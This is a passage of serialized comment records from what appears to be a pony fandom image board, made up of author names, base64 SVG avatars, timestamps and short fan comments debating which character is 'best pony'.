avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiNBMTg3QkUiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzgxNzNBOSIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjQTE4N0JFIi8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjODE3M0E5Ii8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM4MTczQTkiLz48L3N2Zz4=', body='Best pony', id=8915817, created_at=datetime.datetime(2020, 4, 5, 21, 11, 46, tzinfo=datetime.timezone.utc), image_id=1981478, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 5, 21, 11, 46, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Background Pony #B56E', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiNBNTUwNTMiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzY5OEVDMiIvPjxwYXRoIGQ9Ik02My42MiAzNS4wMjVjMTEuNTYyLjczNiAxOS43OTggMy40MzQgMzQuNTY3IDExLjU5NyAyNS4zODMtMTIuMjQzIDE2LjAxLTM1LjUyNC0uNzYzLTM5Ljk5LTE1LjYyNS00LjE2LTI1LjgzLTEuNzU1LTM3LTUuNTY1IDEuOTU2IDQuMTQgNC41NjQgOC4zNDggOCAxMC4zMjItMTguODI2LS4xOC0yOC4xMTMtMy42NzYtNDIuNzUtNy4wNSAyLjk1IDUuMjkgOS45OTQgMTEuNTIgMTMuMjUgMTMuODg0LTEyLjA4MyA1LjA5NC0yMC45MTYtLjA3Ni0zMy0yLjE1IDMuMzMzIDUuODIzIDcuMDQ4IDExLjE5IDEyLjI1IDE0Ljc4My01IDE2LjM0MyAxOS45MTYgMzcuMTk3IDI5Ljc4NyA1Ny4xNCAyLjctMTIuODE1IDQuNzYtMzAuNzkyIDMuMjktNDMuNjA3eiIgZmlsbD0iI0E1NTA1MyIvPjxwYXRoIGQ9Ik05Mi43NTIgMzYuODM0czkuMDkyLTE5LjU3MiA2LjA2LTIyLjczYy0zLjAzLTMuMTU2LTE1LjI3NyAxMS40OTItMTYuOTIgMTYuNTQyIDIuMDIuNTA1IDguMDgyIDIuMjczIDEwLjg2IDYuMTg4eiIgZmlsbD0iIzY5OEVDMiIvPjxwYXRoIGQ9Ik02NC4zNDIgMzUuNTdzMy4yODMtOC4wOC03LjMyNC0xOS4zMThjLTEuNzY4LTEuNzY4LTMuMDMtMi4yNzMtNC42NzItLjc1OC0xLjY0IDEuNTE1LTE3LjA0NiAxNi4wMzYuMjUzIDM4LjI2LjUwNC0yLjQgMS4xMzUtOS41OTcgMS4xMzUtOS41OTd6IiBmaWxsPSIjNjk4RUMyIi8+PC9zdmc+', body='This is my dream right here, having a relaxing experience at the spa with best pony', id=8915809, created_at=datetime.datetime(2020, 4, 5, 21, 6, 24, tzinfo=datetime.timezone.utc), image_id=2314905, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 5, 21, 6, 24, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Background Pony #A77B', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiM4RThDNzEiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzcyOTc5RiIvPjxwYXRoIGQ9Ik01NC4zIDE5LjZjMTkuMTktMTQuOTQ3IDQ0LjQ5LTEyLjY4IDYyLjM4Ni00LjAxNCA0LjY5NyAyLjI3NSAxMS44NTcgMTIuMS0zLjU4MyAxMi4wNSAxMC43NDYgMy44OTMgMTEuODcgMjIuNTYyIDYuNzAyIDI0LjU1OC01Ljk1NiAyLjMtMTAuNzEtNy40MjItMTAuMjI3LTEzLjYzNy0yLjUyMiAxMS4yMTUtOC4zNiAyMi44OTMtMTMuODQgMTguMzEtNC41OTctMy44NDYtNC4xOTItOC42MTctLjk1LTEzLjc2NC01LjY5NCA0LjcyNC0xMS4yOTggNy44NzItMTYuOTkyIDMuNTY2LTUuNzcgMy4yMDQtMTAuNzc2IDguNjI1LTE3LjE4MiA1LjkzLTcuOTM1LTMuMzQtMS4wMjQtMTMuNDY4IDMuOTc2LTE3LjE0My03LjMwOC0uMzE0LTkuODE1IDMuNDU0LTE0LjQzMiAxMi44OTUgMi45NjMgMTcuODUgMTkuNDM4IDMyLjIwMiAxOC41MTcgNDkuMjUtLjUzNiA5LjkxNi00LjY4OCAxMC44OC01Ljg1MiAyLjUxIDEuNjk2IDI1LjI1My04LjYzNCAyNC44MTYtOS4zNTYgMTMuOTA0LTkuNDQ3IDE2LjItMTMuNjI1IDQuNTEtMTAuOTMtNC4xODMgMi4wNTQtNi42MjggNC4wMy0xMi4xNiA2LjQyNS0xNi43NzctMi41NDcgNy42Ni03LjMzMyA1LjIzMi04LjU4MyA0LjQzLTIuODU0LTEuODM0LS44NTUtMTIuMzAyIDQuMDM1LTE5LjMzIDguMy0xMS45My0yMy43My0zMC4xNzIgMi40Ny01My4xOTciIGZpbGw9IiM4RThDNzEiLz48cGF0aCBkPSJNNDMuMjY3IDEwNy4zMjRzLTYuODI1LTE0LjEzNy03LjY0LTMwLjE2NmMtLjgxNy0xNi4wMy00LjE5Ny0zMS40NjgtMTAuNTUtNDAuNjg4LTYuMzU0LTkuMjItMTMuMjcyLTkuNzMtMTEuOTk3LTMuOTgyIDEuMjc1IDUuNzQ4IDExLjEyMyAzMy4wMTYgMTIuMTI4IDM1Ljk1NEMyMy4wNDIgNjUuNjQ4IDcuMDM4IDQxLjExLS40MyAzNy4yMjJjLTcuNDctMy44ODYtOC45Ni4zNDYtNi44OTIgNS44ODUgMi4wNjggNS41NCAxOC41MDcgMzAuODQ0IDIwLjg4NiAzMy41MDItMi43MzgtMS42ODUtMTIuMjU2LTkuMDM2LTE2Ljk5Ny04Ljk5Ni00Ljc0Mi4wNC00LjkxIDUuMzY2LTIuNjE3IDguNTI2IDIuMjkyIDMuMTYyIDIwLjkxMiAxOS4xNzMgMjUuMTUgMjAuOTQ1LTUuMzUuMjgtMTAuMzg0IDEuOTk2LTkuMTg2IDYuMDA0IDEuMiA0LjAwNiAxMS4zODQgMTQuMDYzIDI4LjUzIDEyLjM3NyAyLjU3Ni0yLjgzNCA0LjgyMy04LjE0MyA0LjgyMy04LjE0M3oiIGZpbGw9IiM3Mjk3OUYiLz48cGF0aCBkPSJNNjQuMzQyIDM1LjU3czMuMjgzLTguMDgtNy4zMjQtMTkuMzE4Yy0xLjc2OC0xLjc2OC0zLjAzLTIuMjczLTQuNjcyLS43NTgtMS42NCAxLjUxNS0xNy4wNDYgMTYuMDM2LjI1MyAzOC4yNi41MDQtMi40IDEuMTM1LTkuNTk3IDEuMTM1LTkuNTk3eiIgZmlsbD0iIzcyOTc5RiIvPjwvc3ZnPg==', body='Portu calez > Portugal\r\n"Port of the grail"\r\nGuys, Dash found the Holy Grail. Templars confirmed. Rainbow Dash is best pony.', id=8915112, created_at=datetime.datetime(2020, 4, 5, 14, 35, 8, tzinfo=datetime.timezone.utc), image_id=2314697, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 5, 14, 35, 8, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Doeknight Sprinkles', avatar='https://derpicdn.net/avatars/2020/1/7/1578373965192687025633191.gif', body='I love this! Fluttershy is best pony pred! We need more of this! Thank you opti!', id=8914496, created_at=datetime.datetime(2020, 4, 5, 5, 37, 45, tzinfo=datetime.timezone.utc), image_id=2314498, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 5, 5, 37, 45, tzinfo=datetime.timezone.utc), user_id=450458), Comment(author='Twidorable', avatar='https://derpicdn.net/avatars/2012/6/4/0098cb63fb856eb401.jpg', body='Coloratura is still Best Pony', id=8912304, created_at=datetime.datetime(2020, 4, 4, 5, 16, 46, tzinfo=datetime.timezone.utc), image_id=2312766, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 4, 5, 16, 46, tzinfo=datetime.timezone.utc), user_id=211668), Comment(author='ABronyAccount', avatar='https://derpicdn.net/avatars/2016/03/10/03_39_28_295_CeilingSpikeAvTransparent_125_by_shelltoontv_d3czifb.png', body='"@Rainbow Dash is Best Pony":/images/2308194#comment_8911421\r\nAt least they didn\'t make the site into a Rainbow Factory reference or something awful like that! ^_~', id=8911579, created_at=datetime.datetime(2020, 4, 3, 22, 41, 32, tzinfo=datetime.timezone.utc), image_id=2308194, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 3, 22, 41, 32, tzinfo=datetime.timezone.utc), user_id=341159), Comment(author='Beau Skunky', avatar='https://derpicdn.net/avatars/2012/7/22/045f57f5b8676bad34.jpg', body='"@FlutterButterButt":/images/2313389#comment_8911503\r\nAnd he\'s best pony.', id=8911526, created_at=datetime.datetime(2020, 4, 3, 22, 13, 51, tzinfo=datetime.timezone.utc), image_id=2313389, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 3, 22, 13, 51, tzinfo=datetime.timezone.utc), user_id=222513), Comment(author='radostt', avatar='https://derpicdn.net/avatars/2020/4/6/15861317880504380165861956.jpg', body='Because making mistakes can lead to all kinds of shenanigans. Plus her in the moment writing is more relate able. Shes just the best. Her writing can stand for itself. Plus she has one of the best pony designs in the show, and shes super strong. Shes also a leader.', id=8911129, created_at=datetime.datetime(2020, 4, 3, 19, 13, 35, tzinfo=datetime.timezone.utc), image_id=2042365, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 3, 19, 13, 35, tzinfo=datetime.timezone.utc), user_id=357245), Comment(author='radostt', avatar='https://derpicdn.net/avatars/2020/4/6/15861317880504380165861956.jpg', body='3 best ponies in the show.', id=8911122, created_at=datetime.datetime(2020, 4, 3, 19, 8, 52, tzinfo=datetime.timezone.utc), image_id=2053410, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 3, 19, 8, 52, tzinfo=datetime.timezone.utc), user_id=357245), Comment(author='Background Pony #F783', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiM0QjZCNzUiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzRDNkRDMiIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjNEI2Qjc1Ii8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjNEM2REMyIi8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM0QzZEQzIiLz48L3N2Zz4=', body='"@Azerdoe":/images/2311224#comment_8906195\r\nAJ is best pony as well. They’re awesome and [spoiler]even got together, I know it’s mostly implied but still[/spoiler]', id=8906692, created_at=datetime.datetime(2020, 4, 1, 22, 1, 57, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 1, 22, 1, 57, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Azerdoe', avatar='https://derpicdn.net/avatars/2014/07/12/00_53_04_746_02.jpg', body='"@Background Pony #F783":/images/2311224#comment_8906150\r\n[bq="Background Pony #F783"] "@Azerdoe":/images/2311224#comment_8906021\r\nLol no XD but I do think Dash deserves a best pony spot too! [/bq]\r\nHmmmm.... Well she is a best pony yes, as are the rest of them no doubt. But AJ is the best character in the show bar-none. If you need proof, watch Drowning In Horseshoes character review on her. It explains everything.\r\n\r\nhttps://youtu.be/kWm072ccqyw ', id=8906158, created_at=datetime.datetime(2020, 4, 1, 16, 33, 19, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=datetime.datetime(2020, 4, 1, 16, 33, 39, tzinfo=datetime.timezone.utc), updated_at=datetime.datetime(2020, 4, 1, 16, 33, 39, tzinfo=datetime.timezone.utc), user_id=296207), Comment(author='Background Pony #F783', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiM0QjZCNzUiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzRDNkRDMiIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjNEI2Qjc1Ii8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjNEM2REMyIi8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM0QzZEQzIiLz48L3N2Zz4=', body='"@Azerdoe":/images/2311224#comment_8906021\r\nLol no XD but I do think Dash deserves a best pony spot too!', id=8906150, created_at=datetime.datetime(2020, 4, 1, 16, 29, 19, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 1, 16, 29, 19, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Background Pony #F783', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiM0QjZCNzUiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41M